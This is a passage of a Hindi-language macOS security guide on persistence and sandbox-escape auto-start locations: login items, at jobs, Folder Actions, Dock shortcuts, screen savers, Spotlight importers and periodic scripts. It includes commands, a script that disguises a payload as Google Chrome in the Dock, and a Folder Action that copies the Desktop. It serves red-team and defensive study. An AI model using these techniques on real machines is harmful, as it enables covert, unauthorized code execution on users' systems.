सिस्टम प्राथमिकताएँ -> उपयोगकर्ता और समूह -> **लॉगिन आइटम्स** में आप **उपयोगकर्ता लॉग इन करते समय क्रियान्वित करने के लिए आइटम्स** पा सकते हैं।\
इन्हें सूचीबद्ध करना, कमांड लाइन से जोड़ना और हटाना संभव है:
```bash
#List all items:
osascript -e 'tell application "System Events" to get the name of every login item'
#Add an item:
osascript -e 'tell application "System Events" to make login item at end with properties {path:"/path/to/itemname", hidden:false}'
#Remove an item:
osascript -e 'tell application "System Events" to delete login item "itemname"'
```
ये आइटम फ़ाइल में स्टोर होते हैं **`~/Library/Application Support/com.apple.backgroundtaskmanagementagent`**
**लॉगिन आइटम** को भी इस्तेमाल करके दिखाया जा सकता है API [SMLoginItemSetEnabled](https://developer.apple.com/documentation/servicemanagement/1501557-smloginitemsetenabled?language=objc) जो कॉन्फ़िगरेशन को स्टोर करेगा **`/var/db/com.apple.xpc.launchd/loginitems.501.plist`**
### ZIP के रूप में लॉगिन आइटम
(लॉगिन आइटम के बारे में पिछले खंड की जाँच करें, यह एक विस्तार है)
अगर आप एक **ZIP** फ़ाइल को एक **लॉगिन आइटम** के रूप में स्टोर करते हैं तो **`Archive Utility`** इसे खोलेगा और यदि ज़िप उदाहरण के लिए **`~/Library`** में स्टोर किया गया था और फ़ोल्डर **`LaunchAgents/file.plist`** शामिल था जिसमें एक बैकडोर था, तो वह फ़ोल्डर बनाया जाएगा (यह डिफ़ॉल्ट नहीं है) और प्लिस्ट जोड़ दिया जाएगा ताकि अगली बार जब उपयोगकर्ता फिर से लॉग इन करें, **प्लिस्ट में दिखाए गए बैकडोर को निष्पादित किया जाएगा**।
एक और विकल्प हो सकता है कि उपयोगकर्ता होम में फ़ाइलें **`.bash_profile`** और **`.zshenv`** बनाएं ताकि यदि फ़ोल्डर LaunchAgents पहले से मौजूद है तो यह तकनीक फिर भी काम करेगी।
### At
लेख: [https://theevilbit.github.io/beyond/beyond\_0014/](https://theevilbit.github.io/beyond/beyond\_0014/)
* सैंडबॉक्स को बायपास करने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन आपको **`at`** को **चालू** करना होगा और यह **सक्षम** होना चाहिए
* TCC बायपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* आपको **`at`** को **चालू** करना होगा और यह **सक्षम** होना चाहिए
#### **विवरण**
`at` tasks को **निश्चित समय पर निष्पादित करने के लिए निर्धारित** किया गया है। क्रॉन जॉब्स की तरह, `at` tasks को स्वचालित रूप से पोस्ट-निष्पादित कर दिया जाता है। यह महत्वपूर्ण है कि ये tasks डिफ़ॉल्ट रूप से **अक्षम** होते हैं लेकिन **रूट** उपयोगकर्ता इन्हें **सक्षम** कर सकते हैं:
```bash
sudo launchctl load -F /System/Library/LaunchDaemons/com.apple.atrun.plist
```
यह 1 घंटे में एक फ़ाइल बनाएगा:
```bash
echo "echo 11 > /tmp/at.txt" | at now+1
```
जॉब कतार की जाँच करें `atq:`
```shell-session
sh-3.2# atq
26 Tue Apr 27 00:46:00 2021
22 Wed Apr 28 00:29:00 2021
```
ऊपर हम दो नौकरियां निर्धारित की गई हैं। हम `at -c JOBNUMBER` का उपयोग करके नौकरी का विवरण प्रिंट कर सकते हैं।
```shell-session
sh-3.2# at -c 26
#!/bin/sh
# atrun uid=0 gid=0
# mail csaby 0
umask 22
SHELL=/bin/sh; export SHELL
TERM=xterm-256color; export TERM
USER=root; export USER
SUDO_USER=csaby; export SUDO_USER
SUDO_UID=501; export SUDO_UID
SSH_AUTH_SOCK=/private/tmp/com.apple.launchd.co51iLHIjf/Listeners; export SSH_AUTH_SOCK
__CF_USER_TEXT_ENCODING=0x0:0:0; export __CF_USER_TEXT_ENCODING
MAIL=/var/mail/root; export MAIL
PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin; export PATH
PWD=/Users/csaby; export PWD
SHLVL=1; export SHLVL
SUDO_COMMAND=/usr/bin/su; export SUDO_COMMAND
HOME=/var/root; export HOME
LOGNAME=root; export LOGNAME
LC_CTYPE=UTF-8; export LC_CTYPE
SUDO_GID=20; export SUDO_GID
_=/usr/bin/at; export _
cd /Users/csaby || {
echo 'Execution directory inaccessible' >&2
exit 1
}
unset OLDPWD
echo 11 > /tmp/at.txt
```
{% hint style="warning" %}
यदि AT tasks सक्षम नहीं हैं तो बनाए गए tasks को क्रियान्वित नहीं किया जाएगा।
{% endhint %}
**नौकरी फ़ाइलें** `/private/var/at/jobs/` में मिल सकती हैं।
```
sh-3.2# ls -l /private/var/at/jobs/
total 32
-rw-r--r-- 1 root wheel 6 Apr 27 00:46 .SEQ
-rw------- 1 root wheel 0 Apr 26 23:17 .lockfile
-r-------- 1 root wheel 803 Apr 27 00:46 a00019019bdcd2
-rwx------ 1 root wheel 803 Apr 27 00:46 a0001a019bdcd2
```
फ़ाइल का नाम कतार, नौकरी संख्या, और यह समय शामिल है जिसे यह निर्धारित किया गया है कि कब चलाया जाएगा। उदाहरण के लिए, हम `a0001a019bdcd2` पर एक नज़र डालते हैं।
* `a` - यह कतार है
* `0001a` - हेक्स में नौकरी संख्या, `0x1a = 26`
* `019bdcd2` - हेक्स में समय। यह इपॉक से बीते हुए मिनटों को प्रतिनिधित करता है। `0x019bdcd2` दसमलवी में `26991826` है। यदि हम इसे 60 से गुणा करें तो हमें `1619509560` मिलता है, जो `GMT: 2021. अप्रैल 27, मंगलवार 7:46:00` है।
अगर हम नौकरी फ़ाइल को प्रिंट करते हैं, तो हमें `at -c` का उपयोग करके प्राप्त की गई जानकारी मिलती है।
### फ़ोल्डर क्रियाएँ
लेख: [https://theevilbit.github.io/beyond/beyond\_0024/](https://theevilbit.github.io/beyond/beyond\_0024/)\
लेख: [https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d](https://posts.specterops.io/folder-actions-for-persistence-on-macos-8923f222343d)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन आपको **`System Events`** से संपर्क करने के लिए `osascript` को तर्कों के साथ बुलाने की आवश्यकता है ताकि आप फ़ोल्डर क्रियाएँ कॉन्फ़िगर कर सकें
* TCC छलना: [🟠](https://emojipedia.org/large-orange-circle)
* इसमें डेस्कटॉप, दस्तावेज़ और डाउनलोड जैसी कुछ मूल TCC अनुमतियाँ हैं
#### स्थान
* **`/Library/Scripts/Folder Action Scripts`**
* रूट की आवश्यकता है
* **ट्रिगर**: निर्दिष्ट फ़ोल्डर तक पहुंच
* **`~/Library/Scripts/Folder Action Scripts`**
* **ट्रिगर**: निर्दिष्ट फ़ोल्डर तक पहुंच
#### विवरण और शोषण
फ़ोल्डर क्रियाएँ स्क्रिप्ट हैं जो फ़ोल्डर में परिवर्तनों द्वारा स्वचालित रूप से ट्रिगर होते हैं जैसे आइटम जोड़ना, हटाना, या अन्य क्रियाएँ जैसे फ़ोल्डर विंडो खोलना या आकार बदलना। ये क्रियाएँ विभिन्न कार्यों के लिए उपयोगी हो सकती हैं, और इन्हें विभिन्न तरीकों से ट्रिगर किया जा सकता है जैसे फाइंडर UI या टर्मिनल कमांड्स का उपयोग करके।
फ़ोल्डर क्रियाएँ सेट करने के लिए, आपके पास निम्नलिखित विकल्प हैं:
1. [Automator](https://support.apple.com/guide/automator/welcome/mac) के साथ एक फ़ोल्डर क्रिया वर्कफ़्लो बनाना और इसे एक सेवा के रूप में स्थापित करना।
2. फ़ोल्डर क्रियाएँ सेटअप में एक संदर्भ मेनू के माध्यम से स्क्रिप्ट को मैन्युअल रूप से जोड़ना।
3. `System Events.app` के लिए Apple इवेंट संदेश भेजने के लिए OSAScript का उपयोग करना।
* यह विधि विशेष रूप से सिस्टम में क्रिया को समाहित करने के लिए उपयोगी है।
निम्नलिखित स्क्रिप्ट एक उदाहरण है कि फ़ोल्डर क्रिया द्वारा क्या क्रियाएँ की जा सकती हैं:
```applescript
// source.js
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
ऊपर दिए गए स्क्रिप्ट को फ़ोल्डर क्रियाएँ द्वारा उपयोग के लिए कंपाइल करने के लिए निम्नलिखित का उपयोग करें:
```bash
osacompile -l JavaScript -o folder.scpt source.js
```
धारणा करें कि स्क्रिप्ट को कंपाइल कर दिया गया है, नीचे दिए गए स्क्रिप्ट को निष्पादित करके फोल्डर क्रियाएँ सेट करें। यह स्क्रिप्ट फोल्डर क्रियाएँ को वैश्विक रूप से सक्षम करेगा और पिछले संकलित स्क्रिप्ट को विशेष रूप से डेस्कटॉप फोल्डर से जोड़ देगा।
```javascript
// Enabling and attaching Folder Action
var se = Application("System Events");
se.folderActionsEnabled = true;
var myScript = se.Script({name: "source.js", posixPath: "/tmp/source.js"});
var fa = se.FolderAction({name: "Desktop", path: "/Users/username/Desktop"});
se.folderActions.push(fa);
fa.scripts.push(myScript);
```
उपयोग के साथ सेटअप स्क्रिप्ट चलाएं:
```bash
osascript -l JavaScript /Users/username/attach.scpt
```
* यह उस दिशा है जिससे आप GUI के माध्यम से इस स्थायित्व को कार्यान्वित कर सकते हैं:
यह वह स्क्रिप्ट है जो कार्यान्वित किया जाएगा:
{% code title="source.js" %}
```applescript
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("touch /tmp/folderaction.txt");
app.doShellScript("touch ~/Desktop/folderaction.txt");
app.doShellScript("mkdir /tmp/asd123");
app.doShellScript("cp -R ~/Desktop /tmp/asd123");
```
{% endcode %}
इसे इस प्रकार कंपाइल करें: `osacompile -l JavaScript -o folder.scpt source.js`
इसे इस स्थान पर ले जाएं:
```bash
mkdir -p "$HOME/Library/Scripts/Folder Action Scripts"
mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
```
Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp):
अब, यदि आप **Finder** के साथ उस फ़ोल्डर को खोलते हैं, तो आपका स्क्रिप्ट चलाया जाएगा।
यह विन्यास **plist** में संग्रहित था जो **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** में base64 प्रारूप में स्थित है।
अब, इस परिस्थिति को GUI एक्सेस के बिना तैयार करने का प्रयास करें:
1. **`~/Library/Preferences/com.apple.FolderActionsDispatcher.plist`** की बैकअप के लिए `/tmp` में **`cp ~/Library/Preferences/com.apple.FolderActionsDispatcher.plist /tmp`** कॉपी करें।
2. आपने अभी सेट किए गए फ़ोल्डर एक्शन को **हटाएं**:
अब हमारे पास एक खाली वातावरण है
3. बैकअप फ़ाइल कॉपी करें: `cp /tmp/com.apple.FolderActionsDispatcher.plist ~/Library/Preferences/`
4. इस कॉन्फ़िगरेशन को उपभोक्त करने के लिए Folder Actions Setup.app खोलें: `open "/System/Library/CoreServices/Applications/Folder Actions Setup.app/"`
{% hint style="danger" %}
और यह मेरे लिए काम नहीं किया, लेकिन ये निर्देश लेख से हैं:(
{% endhint %}
### डॉक शॉर्टकट्स
लेख: [https://theevilbit.github.io/beyond/beyond\_0027/](https://theevilbit.github.io/beyond/beyond\_0027/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [✅](https://emojipedia.org/check-mark-button)
* लेकिन आपको सिस्टम के अंदर एक हानिकारक एप्लिकेशन इंस्टॉल करना चाहिए
* TCC बायपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* `~/Library/Preferences/com.apple.dock.plist`
* **ट्रिगर**: जब उपयोगकर्ता डॉक के अंदर ऐप पर क्लिक करता है
#### विवरण और शोषण
डॉक में जो एप्लिकेशन दिखाई देते हैं, वे सभी plist में निर्दिष्ट हैं: **`~/Library/Preferences/com.apple.dock.plist`**
एक एप्लिकेशन जोड़ना संभव है सिर्फ:
{% code overflow="wrap" %}
```bash
# Add /System/Applications/Books.app
defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/System/Applications/Books.app_CFURLStringType0'
# Restart Dock
killall Dock
```
{% endcode %}
कुछ **सामाजिक इंजीनियरिंग** का उपयोग करके आप **उदाहरण के रूप में Google Chrome का अनुकरण** डॉक के अंदर कर सकते हैं और वास्तव में अपनी स्क्रिप्ट को निष्पादित कर सकते हैं:
```bash
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
echo '#!/bin/sh
open /Applications/Google\ Chrome.app/ &
touch /tmp/ImGoogleChrome' > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
CFBundleExecutableGoogle ChromeCFBundleIdentifiercom.google.ChromeCFBundleNameGoogle ChromeCFBundleVersion1.0CFBundleShortVersionString1.0CFBundleInfoDictionaryVersion6.0CFBundlePackageTypeAPPLCFBundleIconFileapp
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add 'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0'
killall Dock
```
### रंग चुनने वाले
लेख: [https://theevilbit.github.io/beyond/beyond\_0017](https://theevilbit.github.io/beyond/beyond\_0017/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* एक बहुत विशिष्ट क्रिया होनी चाहिए
* आप एक और सैंडबॉक्स में समाप्त हो जाएंगे
* TCC बायपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* `/Library/ColorPickers`
* रूट की आवश्यकता है
* ट्रिगर: रंग चुनने वाला उपयोग करें
* `~/Library/ColorPickers`
* ट्रिगर: रंग चुनने वाला उपयोग करें
#### विवरण और शोषण
**अपने कोड के साथ एक रंग चुनने वाले** बंडल को कंपाइल करें (आप [**उदाहरण के रूप में इसे उपयोग कर सकते हैं**](https://github.com/viktorstrate/color-picker-plus)) और एक निर्माता जोड़ें (जैसे [स्क्रीन सेवर खंड](macos-auto-start-locations.md#screen-saver) में) और बंडल को `~/Library/ColorPickers` में कॉपी करें।
फिर, जब रंग चुनने वाला ट्रिगर होता है, तो आपका भी होना चाहिए।
ध्यान दें कि आपकी पुस्तकालय को लोड करने वाला बाइनरी **बहुत प्रतिबंधक सैंडबॉक्स** है: `/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/LegacyExternalColorPickerService-x86_64.xpc/Contents/MacOS/LegacyExternalColorPickerService-x86_64`
{% code overflow="wrap" %}
```bash
[Key] com.apple.security.temporary-exception.sbpl
[Value]
[Array]
[String] (deny file-write* (home-subpath "/Library/Colors"))
[String] (allow file-read* process-exec file-map-executable (home-subpath "/Library/ColorPickers"))
[String] (allow file-read* (extension "com.apple.app-sandbox.read"))
```
{% endcode %}
### फाइंडर सिंक प्लगइन
**लेख**: [https://theevilbit.github.io/beyond/beyond\_0026/](https://theevilbit.github.io/beyond/beyond\_0026/)\
**लेख**: [https://objective-see.org/blog/blog\_0x11.html](https://objective-see.org/blog/blog\_0x11.html)
* सैंडबॉक्स को छलने के लिए उपयोगी: **नहीं, क्योंकि आपको अपना एप्लिकेशन चलाना होगा**
* TCC बायपास: ???
#### स्थान
* एक विशिष्ट एप्लिकेशन
#### विवरण और उत्पीड़न
फाइंडर सिंक एक्सटेंशन के साथ एक एप्लिकेशन उदाहरण [**यहाँ पाया जा सकता है**](https://github.com/D00MFist/InSync).
एप्लिकेशन में `फाइंडर सिंक एक्सटेंशन` हो सकता है। यह एक्सटेंशन एक एप्लिकेशन के अंदर जाएगा जो कि चलाया जाएगा। इसके अतिरिक्त, एक्सटेंशन अपना कोड चलाने के लिए **किसी वैध एप्पल डेवलपर सर्टिफिकेट के साथ साइन किया जाना चाहिए**, यह **सैंडबॉक्स** में होना चाहिए (हालांकि ढीली छूटें जोड़ी जा सकती हैं) और ऐसा कुछ ऐसे के साथ पंजीकृत होना चाहिए:
```bash
pluginkit -a /Applications/FindIt.app/Contents/PlugIns/FindItSync.appex
pluginkit -e use -i com.example.InSync.InSync
```
### स्क्रीन सेवर
लेख: [https://theevilbit.github.io/beyond/beyond\_0016/](https://theevilbit.github.io/beyond/beyond\_0016/)\
लेख: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://posts.specterops.io/saving-your-access-d562bf5bf90b)
* सैंडबॉक्स को छलने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आप एक सामान्य एप्लिकेशन सैंडबॉक्स में खत्म हो जाएंगे
* TCC बायपास: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* `/System/Library/Screen Savers`
* रूट की आवश्यकता
* **ट्रिगर**: स्क्रीन सेवर का चयन करें
* `/Library/Screen Savers`
* रूट की आवश्यकता
* **ट्रिगर**: स्क्रीन सेवर का चयन करें
* `~/Library/Screen Savers`
* **ट्रिगर**: स्क्रीन सेवर का चयन करें
#### विवरण और उत्पीड़न
Xcode में एक नया परियोजना बनाएं और एक नया **स्क्रीन सेवर** उत्पन्न करने के लिए टेम्पलेट का चयन करें। फिर, इसे अपने कोड के साथ जोड़ें, उदाहरण के लिए निम्नलिखित कोड तक लॉग उत्पन्न करने के लिए।
**इसे** बनाएं, और `.saver` बंडल को **`~/Library/Screen Savers`** में कॉपी करें। फिर, स्क्रीन सेवर GUI खोलें और इस पर क्लिक करें, यह बहुत सारे लॉग उत्पन्न करना चाहिए:
```bash
sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "hello_screensaver"'
Timestamp (process)[PID]
2023-09-27 22:55:39.622369+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver void custom(int, const char **)
2023-09-27 22:55:39.622623+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView initWithFrame:isPreview:]
2023-09-27 22:55:39.622704+0200 localhost legacyScreenSaver[41737]: (ScreenSaverExample) hello_screensaver -[ScreenSaverExampleView hasConfigureSheet]
```
{% endcode %}
{% hint style="danger" %}
ध्यान दें कि इस कोड को लोड करने वाले बाइनरी की entitlements में (`/System/Library/Frameworks/ScreenSaver.framework/PlugIns/legacyScreenSaver.appex/Contents/MacOS/legacyScreenSaver`) आपको **`com.apple.security.app-sandbox`** मिलेगा इसलिए आप **सामान्य एप्लिकेशन सैंडबॉक्स के अंदर होंगे**।
{% endhint %}
Saver code:
```objectivec
//
// ScreenSaverExampleView.m
// ScreenSaverExample
//
// Created by Carlos Polop on 27/9/23.
//
#import "ScreenSaverExampleView.h"
@implementation ScreenSaverExampleView
- (instancetype)initWithFrame:(NSRect)frame isPreview:(BOOL)isPreview
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
self = [super initWithFrame:frame isPreview:isPreview];
if (self) {
[self setAnimationTimeInterval:1/30.0];
}
return self;
}
- (void)startAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super startAnimation];
}
- (void)stopAnimation
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super stopAnimation];
}
- (void)drawRect:(NSRect)rect
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
[super drawRect:rect];
}
- (void)animateOneFrame
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return;
}
- (BOOL)hasConfigureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return NO;
}
- (NSWindow*)configureSheet
{
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
return nil;
}
__attribute__((constructor))
void custom(int argc, const char **argv) {
NSLog(@"hello_screensaver %s", __PRETTY_FUNCTION__);
}
@end
```
### स्पॉटलाइट प्लगइन्स
लेख: [https://theevilbit.github.io/beyond/beyond\_0011/](https://theevilbit.github.io/beyond/beyond\_0011/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आप एक एप्लिकेशन सैंडबॉक्स में खत्म हो जाएंगे
* TCC बायपास: [🔴](https://emojipedia.org/large-red-circle)
* सैंडबॉक्स बहुत सीमित लगती है
#### स्थान
* `~/Library/Spotlight/`
* **ट्रिगर**: स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक नया फ़ाइल बनाई जाती है।
* `/Library/Spotlight/`
* **ट्रिगर**: स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक नया फ़ाइल बनाई जाती है।
* रूट की आवश्यकता है
* `/System/Library/Spotlight/`
* **ट्रिगर**: स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक नया फ़ाइल बनाई जाती है।
* रूट की आवश्यकता है
* `Some.app/Contents/Library/Spotlight/`
* **ट्रिगर**: स्पॉटलाइट प्लगइन द्वारा प्रबंधित एक नया फ़ाइल बनाई जाती है।
* नई एप्लिकेशन की आवश्यकता है
#### विवरण और शोषण
स्पॉटलाइट macOS की अंदर बनी खोज सुविधा है, जिसका उद्देश्य उपयोगकर्ताओं को उनके कंप्यूटर पर डेटा तक तेजी से और व्यापक रूप से पहुंचने की सुविधा प्रदान करना है।\
इस त्वरित खोज क्षमता को सुविधाजनक बनाने के लिए, स्पॉटलाइट एक **प्रोप्राइटरी डेटाबेस** बनाए रखता है और एक सूची बनाता है जिसमें **अधिकांश फ़ाइलों को पार्स करके**, फ़ाइलों के नाम और उनकी सामग्री के माध्यम से त्वरित खोज की अनुमति देता है।
स्पॉटलाइट के अंतर्निहित मेकेनिज़्म में एक केंद्रीय प्रक्रिया है जिसका नाम 'mds' है, जो 'मेटाडेटा सर्वर' के लिए खड़ा है। यह प्रक्रिया स्पॉटलाइट सेवा को संचालित करती है। इसके साथ, कई 'mdworker' डेमन हैं जो विभिन्न रखरखाव कार्य करते हैं, जैसे कि विभिन्न फ़ाइल प्रकारों को इंडेक्स करना (`ps -ef | grep mdworker`). ये कार्य स्पॉटलाइट इम्पोर्टर प्लगइन्स या **".mdimporter बंडल्स**" के माध्यम से संभव होते हैं, जो स्पॉटलाइट को विभिन्न फ़ाइल प्रारूपों के साथ सामग्री को समझने और इंडेक्स करने की अनुमति देते हैं।
प्लगइन्स या **`.mdimporter`** बंडल पहले से उल्लिखित स्थानों में स्थित हैं और यदि एक नया बंडल दिखाई देता है तो इसे मिनटों के भीतर लोड किया जाता है (किसी भी सेवा को पुनः आरंभ करने की आवश्यकता नहीं है)। ये बंडल्स इंडिकेट करने की आवश्यकता होती है कि वे कौन से **फ़ाइल प्रकार और एक्सटेंशन को प्रबंधित कर सकते हैं**, इस प्रकार, स्पॉटलाइट उन्हें उपयोग करेगा जब एक नयी फ़ाइल उल्लिखित एक्सटेंशन के साथ बनाई जाती है।
सभी `mdimporters` को खोजना संभव है जोड़कर चल रहा है:
```bash
mdimport -L
Paths: id(501) (
"/System/Library/Spotlight/iWork.mdimporter",
"/System/Library/Spotlight/iPhoto.mdimporter",
"/System/Library/Spotlight/PDF.mdimporter",
[...]
```
और उदाहरण के लिए **/Library/Spotlight/iBooksAuthor.mdimporter** इन प्रकार के फ़ाइलों को पार्स करने के लिए उपयोग किया जाता है (एक्सटेंशन `.iba` और `.book` आदि):
```json
plutil -p /Library/Spotlight/iBooksAuthor.mdimporter/Contents/Info.plist
[...]
"CFBundleDocumentTypes" => [
0 => {
"CFBundleTypeName" => "iBooks Author Book"
"CFBundleTypeRole" => "MDImporter"
"LSItemContentTypes" => [
0 => "com.apple.ibooksauthor.book"
1 => "com.apple.ibooksauthor.pkgbook"
2 => "com.apple.ibooksauthor.template"
3 => "com.apple.ibooksauthor.pkgtemplate"
]
"LSTypeIsPackage" => 0
}
]
[...]
=> {
"UTTypeConformsTo" => [
0 => "public.data"
1 => "public.composite-content"
]
"UTTypeDescription" => "iBooks Author Book"
"UTTypeIdentifier" => "com.apple.ibooksauthor.book"
"UTTypeReferenceURL" => "http://www.apple.com/ibooksauthor"
"UTTypeTagSpecification" => {
"public.filename-extension" => [
0 => "iba"
1 => "book"
]
}
}
[...]
```
{% hint style="danger" %}
यदि आप अन्य `mdimporter` की Plist की जाँच करते हैं तो आपको प्रविष्टि **`UTTypeConformsTo`** नहीं मिलेगा। इसका कारण यह है कि यह एक बिल्ट-इन _यूनिफॉर्म टाइप पहचानकर्ता_ ([UTI](https://en.wikipedia.org/wiki/Uniform\_Type\_Identifier)) है और इसे विस्तारित करने की आवश्यकता नहीं है।
इसके अतिरिक्त, सिस्टम डिफ़ॉल्ट प्लगइन हमेशा प्राधानता देते हैं, इसलिए एक हमलावर केवल उन फ़ाइलों तक पहुँच सकता है जिन्हें एप्पल के अपने `mdimporters` द्वारा अन्यथा सूचीबद्ध नहीं किया गया है।
{% endhint %}
अपना खुद का इम्पोर्टर बनाने के लिए आप इस परियोजना से शुरू कर सकते हैं: [https://github.com/megrimm/pd-spotlight-importer](https://github.com/megrimm/pd-spotlight-importer) और फिर नाम, **`CFBundleDocumentTypes`** बदलें और **`UTImportedTypeDeclarations`** जो आपके समर्थन करना चाहते हैं उन एक्सटेंशन को समर्थन करने के लिए जोड़ें और उन्हें **`schema.xml`** में पुनरावृत्त करें।\
फिर **`GetMetadataForFile`** फ़ंक्शन को बदलें ताकि जब प्रोसेस किए गए एक्सटेंशन वाली फ़ाइल बनाई जाए तो आपका पेलोड निष्पादित हो।
अंत में अपना नया `.mdimporter` **बनाएं और कॉपी करें** एक में से तीन पिछले स्थानों में और आप जब भी यह लोड होता है **लॉगों की निगरानी** या **`mdimport -L`** की जांच कर सकते हैं।
### ~~प्राथमिकता पैन~~
{% hint style="danger" %}
ऐसा लगता नहीं है कि यह अब काम कर रहा है।
{% endhint %}
लेख: [https://theevilbit.github.io/beyond/beyond\_0009/](https://theevilbit.github.io/beyond/beyond\_0009/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* इसे विशेष उपयोगकर्ता क्रिया की आवश्यकता है
* TCC छलावा: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* **`/System/Library/PreferencePanes`**
* **`/Library/PreferencePanes`**
* **`~/Library/PreferencePanes`**
#### विवरण
ऐसा लगता नहीं है कि यह अब काम कर रहा है।
## रूट सैंडबॉक्स छलावा
{% hint style="success" %}
यहाँ आपको **सैंडबॉक्स छलावा** के लिए उपयोगी शुरू स्थान मिलेंगे जो आपको बस **किसी फ़ाइल में लिखकर कुछ निष्पादित करने** की अनुमति देते हैं जो **रूट** होती है और/या अन्य **अजीब स्थितियों की आवश्यकता** होती है।
{% endhint %}
### आवधिक
लेख: [https://theevilbit.github.io/beyond/beyond\_0019/](https://theevilbit.github.io/beyond/beyond\_0019/)
* सैंडबॉक्स को छलने के लिए उपयोगी: [🟠](https://emojipedia.org/large-orange-circle)
* लेकिन आपको रूट होना चाहिए
* TCC छलावा: [🔴](https://emojipedia.org/large-red-circle)
#### स्थान
* `/etc/periodic/daily`, `/etc/periodic/weekly`, `/etc/periodic/monthly`, `/usr/local/etc/periodic`
* रूट की आवश्यकता है
* **ट्रिगर**: जब समय आता है
* `/etc/daily.local`, `/etc/weekly.local` या `/etc/monthly.local`
* रूट की आवश्यकता है
* **ट्रिगर**: जब समय आता है
#### विवरण और शोषण
आवधिक स्क्रिप्ट (**`/etc/periodic`**) `/System/Library/LaunchDaemons/com.apple.periodic*` में कॉन्फ़िगर किए गए **लॉन्च डेमन्स** के कारण निष्पादित होते हैं। ध्यान दें कि `/etc/periodic/` में स्टोर किए गए स्क्रिप्ट्स **फ़ाइल के मालिक के रूप में निष्पादित** होते हैं, इसलिए यह किसी संभावित प्रिविलेज उन्नति के लिए काम नहीं करेगा।
{% code overflow="wrap" %}
```bash
# Launch daemons that will execute the periodic scripts
ls -l /System/Library/LaunchDaemons/com.apple.periodic*
-rw-r--r-- 1 root wheel 887 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-daily.plist
-rw-r--r-- 1 root wheel 895 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-monthly.plist
-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x 11 root wheel 352 May 13 00:29 daily
drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly
drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly
/etc/periodic/daily:
total 72
-rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs
[...]
/etc/periodic/monthly:
total 24
-rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax
-rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting
-rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local
/etc/periodic/weekly:
total 8
-rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local
```
{% endcode %}
अन्य नियमित स्क्रिप्ट हैं जो क्रियान्वित किए जाएंगे जो **`/etc/defaults/periodic.conf`** में निर्दिष्ट किए गए हैं:
```bash
grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local" # Local scripts
weekly_local="/etc/weekly.local" # Local scripts
monthly_local="/etc/monthly.local" # Local scripts
```
